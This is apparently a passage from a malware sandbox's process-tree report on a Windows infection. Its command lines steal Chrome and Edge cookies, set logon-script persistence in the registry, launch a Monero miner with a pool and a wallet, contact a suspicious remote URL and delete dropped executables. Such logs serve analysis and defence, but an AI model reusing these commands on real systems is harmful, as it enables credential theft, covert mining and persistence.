                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:4872
                                                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                            "C:\Windows\System32\rundll32.exe" .\QnEJR.fPC,a
                                                                                                                                                                                            2⤵
                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                            PID:3572
                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4188 -s 492
                                                                                                                                                                                          1⤵
                                                                                                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                          • Program crash
                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                          PID:4432
                                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                          taskkill -f -iM "s_a4w_Gz60vAtGEWYMLwn8p2.exe"
                                                                                                                                                                                          1⤵
                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                          PID:5140
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:6048
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-7KS84.tmp\Inlog.tmp
                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-7KS84.tmp\Inlog.tmp" /SL5="$1038C,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                            PID:5656
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-B4N1C.tmp\Setup.exe
                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-B4N1C.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                                                                                                                                              2⤵
                                                                                                                                                                                                PID:6488
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-FVRCH.tmp\Setup.tmp
                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-FVRCH.tmp\Setup.tmp" /SL5="$302B4,17367683,721408,C:\Users\Admin\AppData\Local\Temp\is-B4N1C.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                  PID:6748
                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    "cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-4N126.tmp\{app}\microsoft.cab -F:* %ProgramData%
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                      PID:7040
                                                                                                                                                                                                      • C:\Windows\SysWOW64\expand.exe
                                                                                                                                                                                                        expand C:\Users\Admin\AppData\Local\Temp\is-4N126.tmp\{app}\microsoft.cab -F:* C:\ProgramData
                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                                        PID:6476
                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                      "cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                        PID:7852
                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                          reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                          PID:7440
                                                                                                                                                                                                      • C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
                                                                                                                                                                                                        "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                          PID:1772
                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                          "cmd.exe" /c start http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^&param=721
                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                            PID:4616
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-4N126.tmp\{app}\vdi_compiler.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-4N126.tmp\{app}\vdi_compiler"
                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                              PID:7348
                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                "C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-4N126.tmp\{app}\vdi_compiler.exe"
                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                  PID:3916
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                    ping localhost -n 4
                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                    • Runs ping.exe
                                                                                                                                                                                                                    PID:9564
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-86MO4.tmp\Stats.tmp
                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-86MO4.tmp\Stats.tmp" /SL5="$401C8,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                          PID:5540
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-HEDQS.tmp\builder.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-HEDQS.tmp\builder.exe" -algo'' -pool'stratum+tcp://xmr-asia1.nanopool.org:14444' -wallet'42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s' -load'50' -idleload'50' -loggerSa'2no.co' -loggerS'1C6Ua7' -loggerRa'iplogger.org' -loggerR'1cmAy7' -loggerWa'2no.co' -loggerW'' -ico'' -glue'' -error'' -worker'' -icrypt'' -sremoval'' -ntask'SystemCheck' -ptask'System\' -atask'Microsoft_Corporation' -dtask'Starts_a_system_diagnostics_application_to_scan_for_errors_and_performance_problems.' -pinstall'Roaming\Microsoft\Windows\' -ninstall'Helper' -sinstall'-SystemCheck'
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                            PID:5944
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                          PID:5432
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                            PID:5800
                                                                                                                                                                                                          • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                            PID:5052
                                                                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                              PID:4268
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                              PID:2172
                                                                                                                                                                                                            • C:\Users\Admin\Documents\N48iw3nZjB1baMAWyOG6qthM.exe
                                                                                                                                                                                                              C:\Users\Admin\Documents\N48iw3nZjB1baMAWyOG6qthM.exe
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                              PID:2756
                                                                                                                                                                                                            • C:\Users\Admin\Documents\N48iw3nZjB1baMAWyOG6qthM.exe
                                                                                                                                                                                                              C:\Users\Admin\Documents\N48iw3nZjB1baMAWyOG6qthM.exe
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                              PID:5092
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                PID:2204
                                                                                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                  PID:4872
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-O0PKB.tmp\Bcq7BKJ1CzU1vB7GIA4wP2Rw.tmp
                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-O0PKB.tmp\Bcq7BKJ1CzU1vB7GIA4wP2Rw.tmp" /SL5="$4022C,138429,56832,C:\Users\Admin\Documents\Bcq7BKJ1CzU1vB7GIA4wP2Rw.exe"
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                  PID:7220
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-JM53J.tmp\Setup.exe
                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-JM53J.tmp\Setup.exe" /Verysilent
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                      PID:9188
                                                                                                                                                                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
                                                                                                                                                                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                        • Modifies system certificate store
                                                                                                                                                                                                                        PID:8272
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                          "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629472577 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                            PID:9580
                                                                                                                                                                                                                    • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                      C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                      • Enumerates connected drives
                                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                                      PID:5248
                                                                                                                                                                                                                      • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                        C:\Windows\syswow64\MsiExec.exe -Embedding 03DDFE0FEDD7E6254FA9574E098B0030 C
                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                        PID:7016
                                                                                                                                                                                                                      • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                        C:\Windows\syswow64\MsiExec.exe -Embedding BAC7424474C810094A1B313890271DCB C
                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                        PID:8924
                                                                                                                                                                                                                      • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                        C:\Windows\syswow64\MsiExec.exe -Embedding 5252F937DB65E889B8095BDB24CADA33
                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                        • Blocklisted process makes network request
                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                        PID:8528
                                                                                                                                                                                                                      • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                        C:\Windows\syswow64\MsiExec.exe -Embedding DAEA9E93C7744C22589A938267EBDD35 C
                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                          PID:8780
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe
                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                            PID:6704
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe
                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                PID:9916
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"
                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                    PID:2828
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x208,0x20c,0x210,0x1e4,0x214,0x7fff2c4ddec0,0x7fff2c4dded0,0x7fff2c4ddee0
                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                        PID:6576
                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ff713e89e70,0x7ff713e89e80,0x7ff713e89e90
                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                            PID:984
                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1636,2849219817749298795,4692472151914277804,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2828_1574600235" --mojo-platform-channel-handle=1700 /prefetch:8
                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                            PID:6856
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1636,2849219817749298795,4692472151914277804,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2828_1574600235" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1652 /prefetch:2
                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                              PID:492
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1636,2849219817749298795,4692472151914277804,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2828_1574600235" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2532 /prefetch:1
                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                PID:9696
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1636,2849219817749298795,4692472151914277804,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2828_1574600235" --mojo-platform-channel-handle=2192 /prefetch:8
                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                  PID:8436
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1636,2849219817749298795,4692472151914277804,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2828_1574600235" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2668 /prefetch:1
                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                    PID:9884
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1636,2849219817749298795,4692472151914277804,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2828_1574600235" --mojo-platform-channel-handle=3144 /prefetch:8
                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                      PID:5380
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1636,2849219817749298795,4692472151914277804,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2828_1574600235" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3212 /prefetch:2
                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                        PID:5636
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1636,2849219817749298795,4692472151914277804,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2828_1574600235" --mojo-platform-channel-handle=3416 /prefetch:8
                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                          PID:9420
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1636,2849219817749298795,4692472151914277804,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2828_1574600235" --mojo-platform-channel-handle=3520 /prefetch:8
                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                            PID:8120
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1636,2849219817749298795,4692472151914277804,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2828_1574600235" --mojo-platform-channel-handle=3424 /prefetch:8
                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                              PID:9644
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1636,2849219817749298795,4692472151914277804,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2828_1574600235" --mojo-platform-channel-handle=2636 /prefetch:8
                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                PID:7244
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_7B24.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites' -retry_count 10"
                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                              PID:6076
                                                                                                                                                                                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                                                                                          PID:7212
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                              PID:7392
                                                                                                                                                                                                                                                          • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                            c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                              PID:6288
                                                                                                                                                                                                                                                              • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                                                                DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{792d7a06-a7aa-6f4f-98f7-a42ab3be6073}\oemvista.inf" "9" "4d14a44ff" "0000000000000174" "WinSta0\Default" "0000000000000178" "208" "c:\program files (x86)\maskvpn\driver\win764"
                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                PID:4452
                                                                                                                                                                                                                                                              • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                                                                DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000174"
                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                  PID:6032
                                                                                                                                                                                                                                                              • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                                                                                                                                PID:8388
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                    PID:9028
                                                                                                                                                                                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                    PID:7292
                                                                                                                                                                                                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                      PID:8752
                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                        PID:7340
                                                                                                                                                                                                                                                                      • C:\Windows\system32\browser_broker.exe
